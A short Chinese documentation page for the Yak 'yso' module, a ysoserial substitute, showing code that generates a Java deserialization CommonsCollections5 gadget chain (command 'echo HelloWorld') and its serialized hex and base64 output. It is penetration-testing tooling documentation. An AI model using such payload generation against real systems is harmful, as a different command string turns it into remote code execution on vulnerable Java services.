Java 反序列化利用链: yso(ysoserial)
Yak 通过非 Java 的方式实现了一整套 Java 反序列化协议。
可以在一定容错限度内劫持绝大部分 Java 反序列化流。
详情参考 java: java 反序列化协议的 Golang/Yak 实现
YSoSerial 的 Yak 替代品#
在实现了 Java 反序列化协议后,Java 相关漏洞不再需要原生 Java 或硬编码 HEX/Binary 流来实现。
evilCls, err = yso.GetCommonsCollections5("echo HelloWorld")die(err)
bytes = java.MarshalJavaObjects(evilCls)hexStr = codec.EncodeToHex(bytes)base64Str = codec.EncodeBase64(bytes)
dump(bytes)println(hexStr + "\n")println(base64Str + "\n")
/*OUTPUT:
([]uint8) (len=2084 cap=2304) { 00000000 ac ed 00 05 73 72 00 2e 6a 61 76 61 78 2e 6d 61 |....sr..javax.ma| 00000010 6e 61 67 65 6d 65 6e 74 2e 42 61 64 41 74 74 72 |nagement.BadAttr| 00000020 69 62 75 74 65 56 61 6c 75 65 45 78 70 45 78 63 |ibuteValueExpExc| 00000030 65 70 74 69 6f 6e d4 e7 da ab 63 2d 46 40 02 00 |eption....c-F@..| ...... ...... ...... c 61 6e 67 2e 4e 75 |xr..java.lang.Nu| 000007c0 6d 62 65 72 86 ac 95 1d 0b 94 e0 8b 02 00 00 78 |mber...........x| 000007d0 70 00 00 00 01 73 72 00 11 6a 61 76 61 2e 75 74 |p....sr..java.ut| 000007e0 69 6c 2e 48 61 73 68 4d 61 70 05 07 da c1 c3 16 |il.HashMap......| 000007f0 60 d1 03 00 02 46 00 0a 6c 6f 61 64 46 61 63 74 |`....F..loadFact| 00000800 6f 72 49 00 09 74 68 72 65 73 68 6f 6c 64 78 70 |orI..thresholdxp| 00000810 3f 40 00 00 00 00 00 00 77 08 00 00 00 10 00 00 |[email protected].......| 00000820 00 00 78 78 |..xx|}
aced00057372002e6a617661782e6d616e6167656d656e74......c1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878
rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhj......HVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHg=*/